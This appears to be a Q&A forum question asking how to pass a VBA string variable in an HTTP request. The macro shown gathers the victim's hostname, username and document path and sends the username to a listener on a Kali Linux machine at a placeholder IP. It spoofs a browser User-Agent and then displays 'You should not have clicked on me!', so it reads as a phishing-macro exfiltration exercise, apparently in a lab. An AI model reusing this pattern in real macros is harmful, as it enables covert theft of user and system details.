# Viewing data sent by HTTP request with VBA

Tags: php, excel, vba, http, post

I want to view the content of a variable I send to a Virtual Machine.
It is running a server via Apache (on Kali Linux).

When I send the request, I am not able to see the value of the "UserN" variable. I see the string UserN.

I assume I am sending the content wrong in the URL.

How do I send a string variable through a URL as a GET or POST request in VBA?

VBA Code:

```vb
Sub httpPost()

    Dim HostN As String
    Dim UserN As String
    Dim CurDir As String
    
    'Get Hostname
    HostN = Environ("computername")
    'Get Username
    UserN = Environ("username")
    'Get current directory
    CurDir = ActiveDocument.FullName
    'Debug.Print UserN
 
    Set objHTTP = CreateObject("WinHttp.WinHttpRequest.5.1")
    url = "http://{local-ip}/index.php?user=" & UserN
    objHTTP.Open "GET", url, False
    objHTTP.setRequestHeader "User-Agent", "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:84.0) Gecko/20100101 Firefox/84.0"
    objHTTP.setRequestHeader "Content-Type", "text/html; charset=UTF-8"
   
    'postData = "user=" & UserN
    objHTTP.send '(postData)
    objHTTP.responseText

    Debug.Print objHTTP.responseText

    MsgBox "You should not have clicked on me!"

End Sub
```

Server Side PHP code:

```
<?php
  
$user = var_dump($_GET['user']);  

?>
```